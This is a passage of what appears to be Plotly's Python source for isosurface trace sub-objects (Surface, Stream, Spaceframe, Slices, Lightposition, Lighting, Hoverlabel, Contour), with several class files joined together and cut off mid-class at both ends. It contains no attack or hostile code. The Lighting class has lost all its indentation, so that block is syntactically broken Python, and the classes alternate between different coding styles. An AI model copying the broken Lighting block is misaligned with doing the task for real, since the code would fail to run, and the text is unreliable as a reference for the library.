    
        The 'show' property must be specified as a bool
        (either True, or False)

        Returns
        -------
        bool
        """
        return self['show']

    @show.setter
    def show(self, val):
        self['show'] = val

    # --- parent path -----------------------------------------------------
    @property
    def _parent_path_str(self):
        return 'isosurface'

    # --- property descriptions -------------------------------------------
    @property
    def _prop_descriptions(self):
        return """\
        count
            Sets the number of iso-surfaces between minimum and
            maximum iso-values. By default this value is 2 meaning
            that only minimum and maximum surfaces would be drawn.
        fill
            Sets the fill ratio of the iso-surface. The default
            fill value of the surface is 1 meaning that they are
            entirely shaded. On the other hand Applying a `fill`
            ratio less than one would allow the creation of
            openings parallel to the edges.
        pattern
            Sets the surface pattern of the iso-surface 3-D
            sections. The default pattern of the surface is `all`
            meaning that the rest of surface elements would be
            shaded. The check options (either 1 or 2) could be used
            to draw half of the squares on the surface. Using
            various combinations of capital `A`, `B`, `C`, `D` and
            `E` may also be used to reduce the number of triangles
            on the iso-surfaces and creating other patterns of
            interest.
        show
            Hides/displays surfaces between minimum and maximum
            iso-values.
        """

    def __init__(
        self,
        arg=None,
        count=None,
        fill=None,
        pattern=None,
        show=None,
        **kwargs
    ):
        """
        Construct a new Surface object
        
        Parameters
        ----------
        arg
            dict of properties compatible with this constructor or
            an instance of plotly.graph_objs.isosurface.Surface
        count
            Sets the number of iso-surfaces between minimum and
            maximum iso-values. By default this value is 2 meaning
            that only minimum and maximum surfaces would be drawn.
        fill
            Sets the fill ratio of the iso-surface. The default
            fill value of the surface is 1 meaning that they are
            entirely shaded. On the other hand Applying a `fill`
            ratio less than one would allow the creation of
            openings parallel to the edges.
        pattern
            Sets the surface pattern of the iso-surface 3-D
            sections. The default pattern of the surface is `all`
            meaning that the rest of surface elements would be
            shaded. The check options (either 1 or 2) could be used
            to draw half of the squares on the surface. Using
            various combinations of capital `A`, `B`, `C`, `D` and
            `E` may also be used to reduce the number of triangles
            on the iso-surfaces and creating other patterns of
            interest.
        show
            Hides/displays surfaces between minimum and maximum
            iso-values.

        Returns
        -------
        Surface
        """
        super(Surface, self).__init__('surface')

        # Normalize `arg` into a private dict we can consume destructively.
        if arg is None:
            arg = {}
        elif isinstance(arg, self.__class__):
            arg = arg.to_plotly_json()
        elif isinstance(arg, dict):
            arg = _copy.copy(arg)
        else:
            raise ValueError(
                """\
The first argument to the plotly.graph_objs.isosurface.Surface
constructor must be a dict or
an instance of plotly.graph_objs.isosurface.Surface"""
            )

        # Honour (and remove) the skip_invalid flag while populating.
        self._skip_invalid = kwargs.pop('skip_invalid', False)

        # Wire up one validator per property.
        from plotly.validators.isosurface import (surface as v_surface)
        self._validators['count'] = v_surface.CountValidator()
        self._validators['fill'] = v_surface.FillValidator()
        self._validators['pattern'] = v_surface.PatternValidator()
        self._validators['show'] = v_surface.ShowValidator()

        # Populate: an explicit keyword argument wins over the entry in
        # `arg`; the entry is popped either way so it is not re-processed.
        for _name, _given in (
            ('count', count),
            ('fill', fill),
            ('pattern', pattern),
            ('show', show),
        ):
            _popped = arg.pop(_name, None)
            self[_name] = _popped if _given is None else _given

        # Whatever remains is handled as unknown keyword arguments.
        self._process_kwargs(**dict(arg, **kwargs))

        # Restore strict validation.
        self._skip_invalid = False
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Stream(_BaseTraceHierarchyType):

    # --- maxpoints -------------------------------------------------------
    @property
    def maxpoints(self):
        """
        Sets the maximum number of points to keep on the plots from an
        incoming stream. If `maxpoints` is set to 50, only the newest
        50 points will be displayed on the plot.
    
        The 'maxpoints' property is a number and may be specified as:
          - An int or float in the interval [0, 10000]

        Returns
        -------
        int|float
        """
        return self['maxpoints']

    @maxpoints.setter
    def maxpoints(self, val):
        self['maxpoints'] = val

    # --- token -----------------------------------------------------------
    @property
    def token(self):
        """
        The stream id number links a data trace on a plot with a
        stream. See https://plot.ly/settings for more details.
    
        The 'token' property is a string and must be specified as:
          - A non-empty string

        Returns
        -------
        str
        """
        return self['token']

    @token.setter
    def token(self, val):
        self['token'] = val

    # --- parent path -----------------------------------------------------
    @property
    def _parent_path_str(self):
        return 'isosurface'

    # --- property descriptions -------------------------------------------
    @property
    def _prop_descriptions(self):
        return """\
        maxpoints
            Sets the maximum number of points to keep on the plots
            from an incoming stream. If `maxpoints` is set to 50,
            only the newest 50 points will be displayed on the
            plot.
        token
            The stream id number links a data trace on a plot with
            a stream. See https://plot.ly/settings for more
            details.
        """

    def __init__(self, arg=None, maxpoints=None, token=None, **kwargs):
        """
        Construct a new Stream object
        
        Parameters
        ----------
        arg
            dict of properties compatible with this constructor or
            an instance of plotly.graph_objs.isosurface.Stream
        maxpoints
            Sets the maximum number of points to keep on the plots
            from an incoming stream. If `maxpoints` is set to 50,
            only the newest 50 points will be displayed on the
            plot.
        token
            The stream id number links a data trace on a plot with
            a stream. See https://plot.ly/settings for more
            details.

        Returns
        -------
        Stream
        """
        super(Stream, self).__init__('stream')

        # Normalize `arg` into a private dict we can consume destructively.
        if arg is None:
            arg = {}
        elif isinstance(arg, self.__class__):
            arg = arg.to_plotly_json()
        elif isinstance(arg, dict):
            arg = _copy.copy(arg)
        else:
            raise ValueError(
                """\
The first argument to the plotly.graph_objs.isosurface.Stream
constructor must be a dict or
an instance of plotly.graph_objs.isosurface.Stream"""
            )

        # Honour (and remove) the skip_invalid flag while populating.
        self._skip_invalid = kwargs.pop('skip_invalid', False)

        # Wire up one validator per property.
        from plotly.validators.isosurface import (stream as v_stream)
        self._validators['maxpoints'] = v_stream.MaxpointsValidator()
        self._validators['token'] = v_stream.TokenValidator()

        # Populate: an explicit keyword argument wins over the entry in
        # `arg`; the entry is popped either way so it is not re-processed.
        for _name, _given in (('maxpoints', maxpoints), ('token', token)):
            _popped = arg.pop(_name, None)
            self[_name] = _popped if _given is None else _given

        # Whatever remains is handled as unknown keyword arguments.
        self._process_kwargs(**dict(arg, **kwargs))

        # Restore strict validation.
        self._skip_invalid = False
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Spaceframe(_BaseTraceHierarchyType):

    # --- fill ------------------------------------------------------------
    @property
    def fill(self):
        """
        Sets the fill ratio of the `spaceframe` elements. The default
        fill value is 0.15 meaning that only 15% of the area of every
        faces of tetras would be shaded. Applying a greater `fill`
        ratio would allow the creation of stronger elements or could be
        sued to have entirely closed areas (in case of using 1).
    
        The 'fill' property is a number and may be specified as:
          - An int or float in the interval [0, 1]

        Returns
        -------
        int|float
        """
        return self['fill']

    @fill.setter
    def fill(self, val):
        self['fill'] = val

    # --- show ------------------------------------------------------------
    @property
    def show(self):
        """
        Displays/hides tetrahedron shapes between minimum and maximum
        iso-values. Often useful when either caps or surfaces are
        disabled or filled with values less than 1.
    
        The 'show' property must be specified as a bool
        (either True, or False)

        Returns
        -------
        bool
        """
        return self['show']

    @show.setter
    def show(self, val):
        self['show'] = val

    # --- parent path -----------------------------------------------------
    @property
    def _parent_path_str(self):
        return 'isosurface'

    # --- property descriptions -------------------------------------------
    @property
    def _prop_descriptions(self):
        return """\
        fill
            Sets the fill ratio of the `spaceframe` elements. The
            default fill value is 0.15 meaning that only 15% of the
            area of every faces of tetras would be shaded. Applying
            a greater `fill` ratio would allow the creation of
            stronger elements or could be sued to have entirely
            closed areas (in case of using 1).
        show
            Displays/hides tetrahedron shapes between minimum and
            maximum iso-values. Often useful when either caps or
            surfaces are disabled or filled with values less than
            1.
        """

    def __init__(self, arg=None, fill=None, show=None, **kwargs):
        """
        Construct a new Spaceframe object
        
        Parameters
        ----------
        arg
            dict of properties compatible with this constructor or
            an instance of plotly.graph_objs.isosurface.Spaceframe
        fill
            Sets the fill ratio of the `spaceframe` elements. The
            default fill value is 0.15 meaning that only 15% of the
            area of every faces of tetras would be shaded. Applying
            a greater `fill` ratio would allow the creation of
            stronger elements or could be sued to have entirely
            closed areas (in case of using 1).
        show
            Displays/hides tetrahedron shapes between minimum and
            maximum iso-values. Often useful when either caps or
            surfaces are disabled or filled with values less than
            1.

        Returns
        -------
        Spaceframe
        """
        super(Spaceframe, self).__init__('spaceframe')

        # Normalize `arg` into a private dict we can consume destructively.
        if arg is None:
            arg = {}
        elif isinstance(arg, self.__class__):
            arg = arg.to_plotly_json()
        elif isinstance(arg, dict):
            arg = _copy.copy(arg)
        else:
            raise ValueError(
                """\
The first argument to the plotly.graph_objs.isosurface.Spaceframe
constructor must be a dict or
an instance of plotly.graph_objs.isosurface.Spaceframe"""
            )

        # Honour (and remove) the skip_invalid flag while populating.
        self._skip_invalid = kwargs.pop('skip_invalid', False)

        # Wire up one validator per property.
        from plotly.validators.isosurface import (spaceframe as v_spaceframe)
        self._validators['fill'] = v_spaceframe.FillValidator()
        self._validators['show'] = v_spaceframe.ShowValidator()

        # Populate: an explicit keyword argument wins over the entry in
        # `arg`; the entry is popped either way so it is not re-processed.
        for _name, _given in (('fill', fill), ('show', show)):
            _popped = arg.pop(_name, None)
            self[_name] = _popped if _given is None else _given

        # Whatever remains is handled as unknown keyword arguments.
        self._process_kwargs(**dict(arg, **kwargs))

        # Restore strict validation.
        self._skip_invalid = False
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Slices(_BaseTraceHierarchyType):

    # --- x ---------------------------------------------------------------
    @property
    def x(self):
        """
        The 'x' property is an instance of X
        that may be specified as:
          - An instance of plotly.graph_objs.isosurface.slices.X
          - A dict of string/value properties that will be passed
            to the X constructor
    
            Supported dict properties:
                
                fill
                    Sets the fill ratio of the `slices`. The
                    default fill value of the `slices` is 1 meaning
                    that they are entirely shaded. On the other
                    hand Applying a `fill` ratio less than one
                    would allow the creation of openings parallel
                    to the edges.
                locations
                    Specifies the location(s) of slices on the
                    axis. When not specified slices would be
                    created for all points of the axis x except
                    start and end.
                locationssrc
                    Sets the source reference on plot.ly for
                    locations .
                show
                    Determines whether or not slice planes about
                    the x dimension are drawn.

        Returns
        -------
        plotly.graph_objs.isosurface.slices.X
        """
        return self['x']

    @x.setter
    def x(self, val):
        self['x'] = val

    # --- y ---------------------------------------------------------------
    @property
    def y(self):
        """
        The 'y' property is an instance of Y
        that may be specified as:
          - An instance of plotly.graph_objs.isosurface.slices.Y
          - A dict of string/value properties that will be passed
            to the Y constructor
    
            Supported dict properties:
                
                fill
                    Sets the fill ratio of the `slices`. The
                    default fill value of the `slices` is 1 meaning
                    that they are entirely shaded. On the other
                    hand Applying a `fill` ratio less than one
                    would allow the creation of openings parallel
                    to the edges.
                locations
                    Specifies the location(s) of slices on the
                    axis. When not specified slices would be
                    created for all points of the axis y except
                    start and end.
                locationssrc
                    Sets the source reference on plot.ly for
                    locations .
                show
                    Determines whether or not slice planes about
                    the y dimension are drawn.

        Returns
        -------
        plotly.graph_objs.isosurface.slices.Y
        """
        return self['y']

    @y.setter
    def y(self, val):
        self['y'] = val

    # --- z ---------------------------------------------------------------
    @property
    def z(self):
        """
        The 'z' property is an instance of Z
        that may be specified as:
          - An instance of plotly.graph_objs.isosurface.slices.Z
          - A dict of string/value properties that will be passed
            to the Z constructor
    
            Supported dict properties:
                
                fill
                    Sets the fill ratio of the `slices`. The
                    default fill value of the `slices` is 1 meaning
                    that they are entirely shaded. On the other
                    hand Applying a `fill` ratio less than one
                    would allow the creation of openings parallel
                    to the edges.
                locations
                    Specifies the location(s) of slices on the
                    axis. When not specified slices would be
                    created for all points of the axis z except
                    start and end.
                locationssrc
                    Sets the source reference on plot.ly for
                    locations .
                show
                    Determines whether or not slice planes about
                    the z dimension are drawn.

        Returns
        -------
        plotly.graph_objs.isosurface.slices.Z
        """
        return self['z']

    @z.setter
    def z(self, val):
        self['z'] = val

    # --- parent path -----------------------------------------------------
    @property
    def _parent_path_str(self):
        return 'isosurface'

    # --- property descriptions -------------------------------------------
    @property
    def _prop_descriptions(self):
        return """\
        x
            plotly.graph_objs.isosurface.slices.X instance or dict
            with compatible properties
        y
            plotly.graph_objs.isosurface.slices.Y instance or dict
            with compatible properties
        z
            plotly.graph_objs.isosurface.slices.Z instance or dict
            with compatible properties
        """

    def __init__(self, arg=None, x=None, y=None, z=None, **kwargs):
        """
        Construct a new Slices object
        
        Parameters
        ----------
        arg
            dict of properties compatible with this constructor or
            an instance of plotly.graph_objs.isosurface.Slices
        x
            plotly.graph_objs.isosurface.slices.X instance or dict
            with compatible properties
        y
            plotly.graph_objs.isosurface.slices.Y instance or dict
            with compatible properties
        z
            plotly.graph_objs.isosurface.slices.Z instance or dict
            with compatible properties

        Returns
        -------
        Slices
        """
        super(Slices, self).__init__('slices')

        # Normalize `arg` into a private dict we can consume destructively.
        if arg is None:
            arg = {}
        elif isinstance(arg, self.__class__):
            arg = arg.to_plotly_json()
        elif isinstance(arg, dict):
            arg = _copy.copy(arg)
        else:
            raise ValueError(
                """\
The first argument to the plotly.graph_objs.isosurface.Slices
constructor must be a dict or
an instance of plotly.graph_objs.isosurface.Slices"""
            )

        # Honour (and remove) the skip_invalid flag while populating.
        self._skip_invalid = kwargs.pop('skip_invalid', False)

        # Wire up one validator per property.
        from plotly.validators.isosurface import (slices as v_slices)
        self._validators['x'] = v_slices.XValidator()
        self._validators['y'] = v_slices.YValidator()
        self._validators['z'] = v_slices.ZValidator()

        # Populate: an explicit keyword argument wins over the entry in
        # `arg`; the entry is popped either way so it is not re-processed.
        for _name, _given in (('x', x), ('y', y), ('z', z)):
            _popped = arg.pop(_name, None)
            self[_name] = _popped if _given is None else _given

        # Whatever remains is handled as unknown keyword arguments.
        self._process_kwargs(**dict(arg, **kwargs))

        # Restore strict validation.
        self._skip_invalid = False
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Lightposition(_BaseTraceHierarchyType):

    # --- x ---------------------------------------------------------------
    @property
    def x(self):
        """
        Numeric vector, representing the X coordinate for each vertex.
    
        The 'x' property is a number and may be specified as:
          - An int or float in the interval [-100000, 100000]

        Returns
        -------
        int|float
        """
        return self['x']

    @x.setter
    def x(self, val):
        self['x'] = val

    # --- y ---------------------------------------------------------------
    @property
    def y(self):
        """
        Numeric vector, representing the Y coordinate for each vertex.
    
        The 'y' property is a number and may be specified as:
          - An int or float in the interval [-100000, 100000]

        Returns
        -------
        int|float
        """
        return self['y']

    @y.setter
    def y(self, val):
        self['y'] = val

    # --- z ---------------------------------------------------------------
    @property
    def z(self):
        """
        Numeric vector, representing the Z coordinate for each vertex.
    
        The 'z' property is a number and may be specified as:
          - An int or float in the interval [-100000, 100000]

        Returns
        -------
        int|float
        """
        return self['z']

    @z.setter
    def z(self, val):
        self['z'] = val

    # --- parent path -----------------------------------------------------
    @property
    def _parent_path_str(self):
        return 'isosurface'

    # --- property descriptions -------------------------------------------
    @property
    def _prop_descriptions(self):
        return """\
        x
            Numeric vector, representing the X coordinate for each
            vertex.
        y
            Numeric vector, representing the Y coordinate for each
            vertex.
        z
            Numeric vector, representing the Z coordinate for each
            vertex.
        """

    def __init__(self, arg=None, x=None, y=None, z=None, **kwargs):
        """
        Construct a new Lightposition object
        
        Parameters
        ----------
        arg
            dict of properties compatible with this constructor or
            an instance of
            plotly.graph_objs.isosurface.Lightposition
        x
            Numeric vector, representing the X coordinate for each
            vertex.
        y
            Numeric vector, representing the Y coordinate for each
            vertex.
        z
            Numeric vector, representing the Z coordinate for each
            vertex.

        Returns
        -------
        Lightposition
        """
        super(Lightposition, self).__init__('lightposition')

        # Normalize `arg` into a private dict we can consume destructively.
        if arg is None:
            arg = {}
        elif isinstance(arg, self.__class__):
            arg = arg.to_plotly_json()
        elif isinstance(arg, dict):
            arg = _copy.copy(arg)
        else:
            raise ValueError(
                """\
The first argument to the plotly.graph_objs.isosurface.Lightposition
constructor must be a dict or
an instance of plotly.graph_objs.isosurface.Lightposition"""
            )

        # Honour (and remove) the skip_invalid flag while populating.
        self._skip_invalid = kwargs.pop('skip_invalid', False)

        # Wire up one validator per property.
        from plotly.validators.isosurface import lightposition as v_lightposition
        self._validators['x'] = v_lightposition.XValidator()
        self._validators['y'] = v_lightposition.YValidator()
        self._validators['z'] = v_lightposition.ZValidator()

        # Populate: an explicit keyword argument wins over the entry in
        # `arg`; the entry is popped either way so it is not re-processed.
        for _name, _given in (('x', x), ('y', y), ('z', z)):
            _popped = arg.pop(_name, None)
            self[_name] = _popped if _given is None else _given

        # Whatever remains is handled as unknown keyword arguments.
        self._process_kwargs(**dict(arg, **kwargs))

        # Restore strict validation.
        self._skip_invalid = False
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Lighting(_BaseTraceHierarchyType):
# ambient
# -------
@property
def ambient(self):
"""
Ambient light increases overall color visibility but can wash
out the image.
The 'ambient' property is a number and may be specified as:
- An int or float in the interval [0, 1]
Returns
-------
int|float
"""
return self['ambient']
@ambient.setter
def ambient(self, val):
self['ambient'] = val
# diffuse
# -------
@property
def diffuse(self):
"""
Represents the extent that incident rays are reflected in a
range of angles.
The 'diffuse' property is a number and may be specified as:
- An int or float in the interval [0, 1]
Returns
-------
int|float
"""
return self['diffuse']
@diffuse.setter
def diffuse(self, val):
self['diffuse'] = val
# facenormalsepsilon
# ------------------
@property
def facenormalsepsilon(self):
"""
Epsilon for face normals calculation avoids math issues arising
from degenerate geometry.
The 'facenormalsepsilon' property is a number and may be specified as:
- An int or float in the interval [0, 1]
Returns
-------
int|float
"""
return self['facenormalsepsilon']
@facenormalsepsilon.setter
def facenormalsepsilon(self, val):
self['facenormalsepsilon'] = val
# fresnel
# -------
@property
def fresnel(self):
"""
Represents the reflectance as a dependency of the viewing
angle; e.g. paper is reflective when viewing it from the edge
of the paper (almost 90 degrees), causing shine.
The 'fresnel' property is a number and may be specified as:
- An int or float in the interval [0, 5]
Returns
-------
int|float
"""
return self['fresnel']
@fresnel.setter
def fresnel(self, val):
self['fresnel'] = val
# roughness
# ---------
@property
def roughness(self):
"""
Alters specular reflection; the rougher the surface, the wider
and less contrasty the shine.
The 'roughness' property is a number and may be specified as:
- An int or float in the interval [0, 1]
Returns
-------
int|float
"""
return self['roughness']
@roughness.setter
def roughness(self, val):
self['roughness'] = val
# specular
# --------
@property
def specular(self):
"""
Represents the level that incident rays are reflected in a
single direction, causing shine.
The 'specular' property is a number and may be specified as:
- An int or float in the interval [0, 2]
Returns
-------
int|float
"""
return self['specular']
@specular.setter
def specular(self, val):
self['specular'] = val
# vertexnormalsepsilon
# --------------------
@property
def vertexnormalsepsilon(self):
"""
Epsilon for vertex normals calculation avoids math issues
arising from degenerate geometry.
The 'vertexnormalsepsilon' property is a number and may be specified as:
- An int or float in the interval [0, 1]
Returns
-------
int|float
"""
return self['vertexnormalsepsilon']
@vertexnormalsepsilon.setter
def vertexnormalsepsilon(self, val):
self['vertexnormalsepsilon'] = val
# property parent name
# --------------------
@property
def _parent_path_str(self):
return 'isosurface'
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
ambient
Ambient light increases overall color visibility but
can wash out the image.
diffuse
Represents the extent that incident rays are reflected
in a range of angles.
facenormalsepsilon
Epsilon for face normals calculation avoids math issues
arising from degenerate geometry.
fresnel
Represents the reflectance as a dependency of the
viewing angle; e.g. paper is reflective when viewing it
from the edge of the paper (almost 90 degrees), causing
shine.
roughness
Alters specular reflection; the rougher the surface,
the wider and less contrasty the shine.
specular
Represents the level that incident rays are reflected
in a single direction, causing shine.
vertexnormalsepsilon
Epsilon for vertex normals calculation avoids math
issues arising from degenerate geometry.
"""
def __init__(
self,
arg=None,
ambient=None,
diffuse=None,
facenormalsepsilon=None,
fresnel=None,
roughness=None,
specular=None,
vertexnormalsepsilon=None,
**kwargs
):
"""
Construct a new Lighting object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of plotly.graph_objs.isosurface.Lighting
ambient
Ambient light increases overall color visibility but
can wash out the image.
diffuse
Represents the extent that incident rays are reflected
in a range of angles.
facenormalsepsilon
Epsilon for face normals calculation avoids math issues
arising from degenerate geometry.
fresnel
Represents the reflectance as a dependency of the
viewing angle; e.g. paper is reflective when viewing it
from the edge of the paper (almost 90 degrees), causing
shine.
roughness
Alters specular reflection; the rougher the surface,
the wider and less contrasty the shine.
specular
Represents the level that incident rays are reflected
in a single direction, causing shine.
vertexnormalsepsilon
Epsilon for vertex normals calculation avoids math
issues arising from degenerate geometry.
Returns
-------
Lighting
"""
super(Lighting, self).__init__('lighting')
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.isosurface.Lighting
constructor must be a dict or
an instance of plotly.graph_objs.isosurface.Lighting"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop('skip_invalid', False)
# Import validators
# -----------------
from plotly.validators.isosurface import (lighting as v_lighting)
# Initialize validators
# ---------------------
self._validators['ambient'] = v_lighting.AmbientValidator()
self._validators['diffuse'] = v_lighting.DiffuseValidator()
self._validators['facenormalsepsilon'
] = v_lighting.FacenormalsepsilonValidator()
self._validators['fresnel'] = v_lighting.FresnelValidator()
self._validators['roughness'] = v_lighting.RoughnessValidator()
self._validators['specular'] = v_lighting.SpecularValidator()
self._validators['vertexnormalsepsilon'
] = v_lighting.VertexnormalsepsilonValidator()
# Populate data dict with properties
# ----------------------------------
_v = arg.pop('ambient', None)
self['ambient'] = ambient if ambient is not None else _v
_v = arg.pop('diffuse', None)
self['diffuse'] = diffuse if diffuse is not None else _v
_v = arg.pop('facenormalsepsilon', None)
self['facenormalsepsilon'
] = facenormalsepsilon if facenormalsepsilon is not None else _v
_v = arg.pop('fresnel', None)
self['fresnel'] = fresnel if fresnel is not None else _v
_v = arg.pop('roughness', None)
self['roughness'] = roughness if roughness is not None else _v
_v = arg.pop('specular', None)
self['specular'] = specular if specular is not None else _v
_v = arg.pop('vertexnormalsepsilon', None)
self[
'vertexnormalsepsilon'
] = vertexnormalsepsilon if vertexnormalsepsilon is not None else _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Hoverlabel(_BaseTraceHierarchyType):

    # align
    # -----
    @property
    def align(self):
        """
        Sets the horizontal alignment of the text content within hover
        label box. Has an effect only if the hover label text spans
        more two or more lines

        The 'align' property may be one of ['left', 'right', 'auto'],
        or a tuple, list, or one-dimensional numpy array of those
        values.

        Returns
        -------
        Any|numpy.ndarray
        """
        return self["align"]

    @align.setter
    def align(self, val):
        self["align"] = val

    # alignsrc
    # --------
    @property
    def alignsrc(self):
        """
        Sets the source reference on plot.ly for align .

        The 'alignsrc' property accepts a string or a
        plotly.grid_objs.Column object.

        Returns
        -------
        str
        """
        return self["alignsrc"]

    @alignsrc.setter
    def alignsrc(self, val):
        self["alignsrc"] = val

    # bgcolor
    # -------
    @property
    def bgcolor(self):
        """
        Sets the background color of the hover labels for this trace

        The 'bgcolor' property is a color: a hex string (e.g.
        '#ff0000'), an rgb/rgba, hsl/hsla or hsv/hsva string, any
        named CSS color, or a list/array of any of those.

        Returns
        -------
        str|numpy.ndarray
        """
        return self["bgcolor"]

    @bgcolor.setter
    def bgcolor(self, val):
        self["bgcolor"] = val

    # bgcolorsrc
    # ----------
    @property
    def bgcolorsrc(self):
        """
        Sets the source reference on plot.ly for bgcolor .

        The 'bgcolorsrc' property accepts a string or a
        plotly.grid_objs.Column object.

        Returns
        -------
        str
        """
        return self["bgcolorsrc"]

    @bgcolorsrc.setter
    def bgcolorsrc(self, val):
        self["bgcolorsrc"] = val

    # bordercolor
    # -----------
    @property
    def bordercolor(self):
        """
        Sets the border color of the hover labels for this trace.

        The 'bordercolor' property is a color: a hex string (e.g.
        '#ff0000'), an rgb/rgba, hsl/hsla or hsv/hsva string, any
        named CSS color, or a list/array of any of those.

        Returns
        -------
        str|numpy.ndarray
        """
        return self["bordercolor"]

    @bordercolor.setter
    def bordercolor(self, val):
        self["bordercolor"] = val

    # bordercolorsrc
    # --------------
    @property
    def bordercolorsrc(self):
        """
        Sets the source reference on plot.ly for bordercolor .

        The 'bordercolorsrc' property accepts a string or a
        plotly.grid_objs.Column object.

        Returns
        -------
        str
        """
        return self["bordercolorsrc"]

    @bordercolorsrc.setter
    def bordercolorsrc(self, val):
        self["bordercolorsrc"] = val

    # font
    # ----
    @property
    def font(self):
        """
        Sets the font used in hover labels.

        The 'font' property is an instance of
        plotly.graph_objs.isosurface.hoverlabel.Font, or a dict of
        string/value properties (color, colorsrc, family, familysrc,
        size, sizesrc) passed to the Font constructor.

        Returns
        -------
        plotly.graph_objs.isosurface.hoverlabel.Font
        """
        return self["font"]

    @font.setter
    def font(self, val):
        self["font"] = val

    # namelength
    # ----------
    @property
    def namelength(self):
        """
        Sets the default length (in number of characters) of the trace
        name in the hover labels for all traces. -1 shows the whole
        name regardless of length. 0-3 shows the first 0-3 characters,
        and an integer >3 will show the whole name if it is less than
        that many characters, but if it is longer, will truncate to
        `namelength - 3` characters and add an ellipsis.

        The 'namelength' property is an int (or a float that will be
        cast to an int) in the interval [-1, 9223372036854775807], or
        a tuple, list, or one-dimensional numpy array of those values.

        Returns
        -------
        int|numpy.ndarray
        """
        return self["namelength"]

    @namelength.setter
    def namelength(self, val):
        self["namelength"] = val

    # namelengthsrc
    # -------------
    @property
    def namelengthsrc(self):
        """
        Sets the source reference on plot.ly for namelength .

        The 'namelengthsrc' property accepts a string or a
        plotly.grid_objs.Column object.

        Returns
        -------
        str
        """
        return self["namelengthsrc"]

    @namelengthsrc.setter
    def namelengthsrc(self, val):
        self["namelengthsrc"] = val

    # property parent name
    # --------------------
    @property
    def _parent_path_str(self):
        """Return the path string of this object's parent ('isosurface')."""
        return "isosurface"

    # Self properties description
    # ---------------------------
    @property
    def _prop_descriptions(self):
        # Returned verbatim; content and indentation are significant.
        return """\
        align
            Sets the horizontal alignment of the text content
            within hover label box. Has an effect only if the hover
            label text spans more two or more lines
        alignsrc
            Sets the source reference on plot.ly for align .
        bgcolor
            Sets the background color of the hover labels for this
            trace
        bgcolorsrc
            Sets the source reference on plot.ly for bgcolor .
        bordercolor
            Sets the border color of the hover labels for this
            trace.
        bordercolorsrc
            Sets the source reference on plot.ly for bordercolor .
        font
            Sets the font used in hover labels.
        namelength
            Sets the default length (in number of characters) of
            the trace name in the hover labels for all traces. -1
            shows the whole name regardless of length. 0-3 shows
            the first 0-3 characters, and an integer >3 will show
            the whole name if it is less than that many characters,
            but if it is longer, will truncate to `namelength - 3`
            characters and add an ellipsis.
        namelengthsrc
            Sets the source reference on plot.ly for namelength .
        """

    def __init__(
        self,
        arg=None,
        align=None,
        alignsrc=None,
        bgcolor=None,
        bgcolorsrc=None,
        bordercolor=None,
        bordercolorsrc=None,
        font=None,
        namelength=None,
        namelengthsrc=None,
        **kwargs
    ):
        """
        Construct a new Hoverlabel object

        Parameters
        ----------
        arg
            dict of properties compatible with this constructor or
            an instance of plotly.graph_objs.isosurface.Hoverlabel
        align, alignsrc, bgcolor, bgcolorsrc, bordercolor,
        bordercolorsrc, font, namelength, namelengthsrc
            See the corresponding property docstrings on this class.

        Returns
        -------
        Hoverlabel
        """
        super(Hoverlabel, self).__init__("hoverlabel")

        # Normalize `arg` into a plain dict we can safely pop() from.
        if arg is None:
            arg = {}
        elif isinstance(arg, self.__class__):
            arg = arg.to_plotly_json()
        elif isinstance(arg, dict):
            arg = _copy.copy(arg)
        else:
            raise ValueError(
                """\
The first argument to the plotly.graph_objs.isosurface.Hoverlabel
constructor must be a dict or
an instance of plotly.graph_objs.isosurface.Hoverlabel"""
            )

        # `skip_invalid` is consumed here and reset to False at the end.
        self._skip_invalid = kwargs.pop("skip_invalid", False)

        from plotly.validators.isosurface import hoverlabel as v_hoverlabel

        # One validator instance per property.
        for name, validator in (
            ("align", v_hoverlabel.AlignValidator),
            ("alignsrc", v_hoverlabel.AlignsrcValidator),
            ("bgcolor", v_hoverlabel.BgcolorValidator),
            ("bgcolorsrc", v_hoverlabel.BgcolorsrcValidator),
            ("bordercolor", v_hoverlabel.BordercolorValidator),
            ("bordercolorsrc", v_hoverlabel.BordercolorsrcValidator),
            ("font", v_hoverlabel.FontValidator),
            ("namelength", v_hoverlabel.NamelengthValidator),
            ("namelengthsrc", v_hoverlabel.NamelengthsrcValidator),
        ):
            self._validators[name] = validator()

        # Explicit keyword arguments take precedence over values in `arg`.
        for name, value in (
            ("align", align),
            ("alignsrc", alignsrc),
            ("bgcolor", bgcolor),
            ("bgcolorsrc", bgcolorsrc),
            ("bordercolor", bordercolor),
            ("bordercolorsrc", bordercolorsrc),
            ("font", font),
            ("namelength", namelength),
            ("namelengthsrc", namelengthsrc),
        ):
            fallback = arg.pop(name, None)
            self[name] = value if value is not None else fallback

        # Anything left in `arg`, plus unknown kwargs, is processed together.
        self._process_kwargs(**dict(arg, **kwargs))

        self._skip_invalid = False
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Contour(_BaseTraceHierarchyType):

    # color
    # -----
    @property
    def color(self):
        """
        Sets the color of the contour lines.

        The 'color' property is a color: a hex string (e.g.
        '#ff0000'), an rgb/rgba, hsl/hsla or hsv/hsva string, or any
        named CSS color.

        Returns
        -------
        str
        """
        return self["color"]

    @color.setter
    def color(self, val):
        self["color"] = val

    # show
    # ----
    @property
    def show(self):
        """
        Sets whether or not dynamic contours are shown on hover

        The 'show' property must be a bool (either True, or False).

        Returns
        -------
        bool
        """
        return self["show"]

    @show.setter
    def show(self, val):
        self["show"] = val

    # width
    # -----
    @property
    def width(self):
        """
        Sets the width of the contour lines.

        The 'width' property is an int or float in the interval
